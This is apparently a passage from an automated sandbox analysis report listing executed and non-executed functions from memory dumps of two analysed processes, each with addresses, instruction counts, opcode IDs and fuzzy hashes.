                                                      • Instruction Fuzzy Hash: D611E135A0D7999FE702FB38C4402DC7FB0FF82360F5544B6C080EB292D63826498784
                                                      Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction ID: da91f375dc5599344ca1df00f15f25292241926f59e6661ae6487aab0bb471cd
                                                      • Opcode Fuzzy Hash: 51579a85f28c57a4665a358867c34d433bbd809ec7e43d2ccd29de3fdc2ef011
                                                      • Instruction Fuzzy Hash: 5D018C35A0D7999FE702FB28C4442DDBFB0FF42360F5545B6C080EB292DA386A498B84
                                                      Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction ID: 350b085cc9f45d6b72126a22592a5e4c0f9cb2c449459990c362e321c0736669
                                                      • Opcode Fuzzy Hash: c707df45b09e2ea01fecd6e8552cff513fe671ba12c746fc173e8b05b00d0663
                                                      • Instruction Fuzzy Hash: 5E017C7190D7899FE702EB78C8442DDBFB0FF42354F5541E6D040EB292DA386A49C781
                                                      Function 00007FF848E64F0E Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 20e18b521149f109d1c5373f096f824148e69f7ab6cace4b2ecc555e942360dc
                                                      • Instruction ID: 9b1daad87e10592b94b8dd57b395ef8f8d31143d2980f9cd1419f4083904f4ea
                                                      • Opcode Fuzzy Hash: 20e18b521149f109d1c5373f096f824148e69f7ab6cace4b2ecc555e942360dc
                                                      • Instruction Fuzzy Hash: 5D018F31E0D5668FEB66FA28845467867A0FF64360F9401FAC40EF3296DF397D418B45
                                                      Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 263c9350f97df9560db6524a3598f21c7de07077fee9492285f3d46b86aa2b8d
                                                      • Instruction ID: 749c64cad18296a47163326118c96fe490b8c7d4c55f43bf3d6bb18a1a2a4088
                                                      • Opcode Fuzzy Hash: 263c9350f97df9560db6524a3598f21c7de07077fee9492285f3d46b86aa2b8d
                                                      • Instruction Fuzzy Hash: 83014B7090D7899FE702EB6484842DDBFF0FF02354F5441E6D440EB292DA386A48C745
                                                      Function 00007FF848E62B3D Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 1eefac10af07d2f6764c7d5310106f9e712c5777091c62acccfbc6035f594056
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: A9F0E13094C85E8EEBB4FA14C8456E873A2FB91391F9446B5D40DF31A2DFB879818B48
                                                      Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction ID: 47d914266f96cfb6da44dd35075882d88eb662c4aea8b793287e59a9cc795dae
                                                      • Opcode Fuzzy Hash: 77c885b3911e8bb667b258dc5efa66b8eef583e82c812ca42ca0f707244bfcc4
                                                      • Instruction Fuzzy Hash: 1CF0E53925EA85DFD742AB3DC8A58D4BF60FF03104F9A01EAD089CB963C315685DCB41
                                                      Function 00007FF848E63824 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction ID: 0ebb8008c8aa52596a5baca2a055c8ed622b73bcf0a29714cd5fd3f58db3e768
                                                      • Opcode Fuzzy Hash: dd0dd275d4e51df90db5c9e7dc2fb186f9d55b634055d79a0b6d1e815a684555
                                                      • Instruction Fuzzy Hash: B0E01224D0C11A4FF755F614C8517BD6261BF94340F5400B4D52DB36D2CF787D804749
                                                      Function 00007FF848E61953 Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f7ad341f2c4b6420e59a6466cd6454cdada2733ef106d4917e6579883c85338
                                                      • Instruction ID: 0038fce3cbb6781bdefa68984392c23f333bc5365e44e4e5d6fd9b296777cf74
                                                      • Opcode Fuzzy Hash: 5f7ad341f2c4b6420e59a6466cd6454cdada2733ef106d4917e6579883c85338
                                                      • Instruction Fuzzy Hash: 99D05E2192CA694EEB56B770841A2BD52E2BF10350F8804B8D84EB71D3CF7E34005A84
                                                      Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: b243ce1c8409a49d89244fcce7777f365d9495397e16b6a7a0611b65a11a5de0
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 4CC08C00D1F52B08E445312F14020ACA2007FC46A4FD00032C01C70092AEAD30C5024E
                                                      Function 00007FF848E6559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 3733c24adb4382d9a53a210685dc36ebdcbea8b66b98e3371b2b595405a3d5ea
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: 48D0C92AC1D5238FFA72305448241BD0255BBA03B5FA947B2D83D3A1D5AF7DBD41861A
                                                      Function 00007FF848E612D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: df46ae11a4307f9da4f694c293df9133eccd3b9680619939cdf0be34c2d8d1d6
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: 79C08C309108088FC908FB28C88480837A0FB09200BC20090E008C7170D229ECE0C740
                                                      Function 00007FF848E64E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 681a454d276747f5eb1c6bbf80489068117b187d2349825b53792638a159baeb
                                                      • Instruction ID: a20d33734767f64390d65b80af1417c6b2def6fbb0f2b9ed0daf979c8ffeceff
                                                      • Opcode Fuzzy Hash: 681a454d276747f5eb1c6bbf80489068117b187d2349825b53792638a159baeb
                                                      • Instruction Fuzzy Hash: CBC08C06E0DC5A9AE25A620440222BE44029F80788F8400B5E00E863CACF0C2E01428A
                                                      Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: c48ea8f83d4bdf98d42c17b782ee6a8e6d6751725dcda34e9f4d2d08d944673f
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: E4B01200C6E40F04E408317B084206470407FC4144FC00070D40C70182AA9D3094034A

                                                      Non-executed Functions

                                                      Function 00007FF848E60E43 Relevance: .2, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77f7a49e0c10c06559478b634e68d0346cc0f4194de041313ebbd4f8c8eeed39
                                                      • Instruction ID: f8840054db8d650e989fb18c260a0f81d9a5371f3e4934b46aa4aa775b6be3e5
                                                      • Opcode Fuzzy Hash: 77f7a49e0c10c06559478b634e68d0346cc0f4194de041313ebbd4f8c8eeed39
                                                      • Instruction Fuzzy Hash: 1D51D575A18AAD8EE78CEB2884687B97FE0FB96364F8001BEC049E73D1DBB51415C710
                                                      Function 00007FF848E609B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 3dacdf391927056b34a4cbdcbaced78a33bf6899cda38ba5b813a2fe60b0d8bc
                                                      • Instruction ID: 044a3ba0cf1e019f55236ba56aa21ddff844068ee5ed982584dabd1b33190a10
                                                      • Opcode Fuzzy Hash: 3dacdf391927056b34a4cbdcbaced78a33bf6899cda38ba5b813a2fe60b0d8bc
                                                      • Instruction Fuzzy Hash: 50516ADBADE9637DE21D32BDB0011F96B44EF812B9F4C9677E14C890834E18648686FD

                                                      Executed Functions

                                                      Function 00007FF848E80D48 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Y_H$<M_^
                                                      • API String ID: 0-383103648
                                                      • Opcode ID: 232dae369ca5a4778e365abe1d31ffd831cc82d411ff97e00e1ca4cf05adc193
                                                      • Instruction ID: b9a12990cd1914d41661e6d702d3ba9f5febd862da71100494d904b03ef8ea09
                                                      • Opcode Fuzzy Hash: 232dae369ca5a4778e365abe1d31ffd831cc82d411ff97e00e1ca4cf05adc193
                                                      • Instruction Fuzzy Hash: 7F91E171D1DA898FE789EB2888253BABFE1FB5A350F4401BAC009D72D2DB791805C725
                                                      Function 00007FF848E80E43 Relevance: .2, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9dff691df24974661235833bac1ff73f256b934370d368ffa76c1632886c7f7
                                                      • Instruction ID: 8457209454c74dbfaf49fc612621e4a4a010eb5f4921c5dd89e80d3d40075bd6
                                                      • Opcode Fuzzy Hash: f9dff691df24974661235833bac1ff73f256b934370d368ffa76c1632886c7f7
                                                      • Instruction Fuzzy Hash: 4051B271E28A5D8EE398EB1898557BABFE1FB9A350F4002BEC00AD77D1DBB51411C724
                                                      Function 00007FF849273848 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 88131cd97783cfdd12df28a1ca4805787383d1c4153d0fc97d6dbda80628f66f
                                                      • Instruction ID: d3745b0a82bcc2046f84ad55a94024808df123bbacf786e738cc94f5f47f2085
                                                      • Opcode Fuzzy Hash: 88131cd97783cfdd12df28a1ca4805787383d1c4153d0fc97d6dbda80628f66f
                                                      • Instruction Fuzzy Hash: 7F517A71E0D59A9FEB58EFA8D4515FEB7B2FF45340F1040BAC01AE7282DA396905CB50
                                                      Function 00007FF849278898 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: d8f22ab800e2985fd20c812062bb8b120fa946e6305f5723f72fe067e75e2bb8
                                                      • Instruction ID: b1f427a49eca5ec08e73ddb918193ab96cf39226df25d49168855f9cb5953cc1
                                                      • Opcode Fuzzy Hash: d8f22ab800e2985fd20c812062bb8b120fa946e6305f5723f72fe067e75e2bb8
                                                      • Instruction Fuzzy Hash: 79411831D1869E9FEB59DF94C8905BDBBB2FF49340F5040B9C02AA7282CB396901CB55
                                                      Function 00007FF84927D419 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H:%I
                                                      • API String ID: 0-2985027163
                                                      • Opcode ID: 658aede0181edba98ce3f6959707d3e64449f0a8d92c044b3e04f4af3056c14e
                                                      • Instruction ID: 9830f092c6731afe6c69e3a2cd7d767c8416bfb595b0e58b5acc5d3ba783350e
                                                      • Opcode Fuzzy Hash: 658aede0181edba98ce3f6959707d3e64449f0a8d92c044b3e04f4af3056c14e
                                                      • Instruction Fuzzy Hash: 7F113B31D0DAEA5FF775AA6488586BA37E6EF56390F0401BBD00DE71D2DE683C098360
                                                      Function 00007FF84927CA10 Relevance: .7, Instructions: 688COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76f004e4dadc18be5513fcbf0fb3515d712acb788ffa24aca03961b9b4b2020f
                                                      • Instruction ID: 3f1a40fdb45b81c9e294543b9ff44d711ceb35d1d2096ab752be77b0799f8c97
                                                      • Opcode Fuzzy Hash: 76f004e4dadc18be5513fcbf0fb3515d712acb788ffa24aca03961b9b4b2020f
                                                      • Instruction Fuzzy Hash: BD329530A1CA598FEBA8EF18D895A7977E2FF58350B1041B9D01ED7392DA34EC45CB81
                                                      Function 00007FF84927BB53 Relevance: .5, Instructions: 521COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e6477a149ed3d33e9a4a414e651d53165ef7f8a5c5305d11d6b64eb6180252b
                                                      • Instruction ID: 487f969e9776cd26bfb99cf977ce521ec66cb8790a10ca1653b06f4f0662c428
                                                      • Opcode Fuzzy Hash: 7e6477a149ed3d33e9a4a414e651d53165ef7f8a5c5305d11d6b64eb6180252b
                                                      • Instruction Fuzzy Hash: EDF10D75748819DFDB88EB2CC4A5E7633D2EBACB50B114468E10EC76B6CD30EC418B92
                                                      Function 00007FF849279B51 Relevance: .4, Instructions: 407COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e17c66d49f7228cf4569950f69e30768d4b70838e5268365c88d41ddb6f6339e
                                                      • Instruction ID: 30a0ffde118c39e4948cacb2a05cdc9a96f1c69e5aff34da8fc60c71a824074f
                                                      • Opcode Fuzzy Hash: e17c66d49f7228cf4569950f69e30768d4b70838e5268365c88d41ddb6f6339e
                                                      • Instruction Fuzzy Hash: 38D1E434A0DBA68FF379FF28D49157577E2FF45350B1009BEC0AAC7682DA29B8428741
                                                      Function 00007FF849274B27 Relevance: .4, Instructions: 393COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47c49c88c232349c22aa4c960e680632d8b4bf18ef688eefcfb964cde7ddc7be
                                                      • Instruction ID: 26bcbd82fef44de7acc448ca7f15acc7631fbaba406c06758e7188044a0d3f43
                                                      • Opcode Fuzzy Hash: 47c49c88c232349c22aa4c960e680632d8b4bf18ef688eefcfb964cde7ddc7be
                                                      • Instruction Fuzzy Hash: 7AD1E330A0DF968FE379EF28D49157577E3FF44394B1409BEC4AAC7682DA29B8428741
                                                      Function 00007FF8492869EE Relevance: .3, Instructions: 328COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a061d43d6c4c42f741cb6e695596f4d2b881b90790a4d3f7ac68a1c625c11459
                                                      • Instruction ID: 916f8576e64d9aef33d9c7242986876c30e789ecdfa916e29aaad9250a50fc45
                                                      • Opcode Fuzzy Hash: a061d43d6c4c42f741cb6e695596f4d2b881b90790a4d3f7ac68a1c625c11459
                                                      • Instruction Fuzzy Hash: EBB1D63090CA8D4FEB69EF28D8557E93BE1FF55350F04426EE84DC7292DB34A9458B82
                                                      Function 00007FF849273372 Relevance: .3, Instructions: 326COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 908eb96ecfa5b22258c345710508fcc372296db0fa796dc6b289b1ac9fb57eb0
                                                      • Instruction ID: 8c08c42443ceb20300c526cbef77dcdb0638ebf49680f9e394d925d97640a9fe
                                                      • Opcode Fuzzy Hash: 908eb96ecfa5b22258c345710508fcc372296db0fa796dc6b289b1ac9fb57eb0
                                                      • Instruction Fuzzy Hash: BFC1E170A0CA968FE759EF28D0906B5B7E2FF48340F5445B9C05EC7A86CB38B851CB95
                                                      Function 00007FF849270D57 Relevance: .3, Instructions: 310COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4913ccc8f5ec6288ea82c6318c902800518a1e6e183b669cb85c0bc18aac3aa3
                                                      • Instruction ID: 55fc13d40159cffcaa5cf8118605387b69db9f2c925c682dee5e55e7e346034f
                                                      • Opcode Fuzzy Hash: 4913ccc8f5ec6288ea82c6318c902800518a1e6e183b669cb85c0bc18aac3aa3
                                                      • Instruction Fuzzy Hash: 2021F212DCE6F39EF2393AB828221FC6B429F403A0F1809F6D45DA60C3DD1C28895797
                                                      Function 00007FF8492783C2 Relevance: .3, Instructions: 308COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6f3265c5e659956a47ba6cbf927e2ac78c3c1fece613995fa78d65ac1419d52
                                                      • Instruction ID: 001a93401b758b82449854fbbe5e41109654b9e90cdc163df97a7391ded87650
                                                      • Opcode Fuzzy Hash: b6f3265c5e659956a47ba6cbf927e2ac78c3c1fece613995fa78d65ac1419d52
                                                      • Instruction Fuzzy Hash: C4B1D430A0DA969FE759EF28C4D06B4BBE2FF54340F5441B9C05EC7A86DB28B851CB91
                                                      Function 00007FF849275D87 Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 926fbd55c8a5e63624dcba7c845349e3010d579e651aeefee6e7a93149e9b092
                                                      • Instruction ID: 057d2220c02a9f32c29f590f9a434af98569d158803001ea0c71345fb93800ce
                                                      • Opcode Fuzzy Hash: 926fbd55c8a5e63624dcba7c845349e3010d579e651aeefee6e7a93149e9b092
                                                      • Instruction Fuzzy Hash: 10210812D1D6F78EF2797A6828158FCA642AF537A0F1809FAD46EA60C3DD0C28855297
                                                      Function 00007FF84927E60A Relevance: .3, Instructions: 297COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90c6cb5d7a30bd80fe4604cf6cd35441b14f1c82fe1e870ac8fa16b26199958f
                                                      • Instruction ID: 258a7e8c767df977e9738265bc3dba5ef5019c63d141a459ec465e8fb9d01157
                                                      • Opcode Fuzzy Hash: 90c6cb5d7a30bd80fe4604cf6cd35441b14f1c82fe1e870ac8fa16b26199958f
                                                      • Instruction Fuzzy Hash: 12B1E53090CA969FE799EF28D0946B4FBA2FF45340F4441B9C05EC7A96DB38B851C7A1
                                                      Function 00007FF849278C2F Relevance: .3, Instructions: 286COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
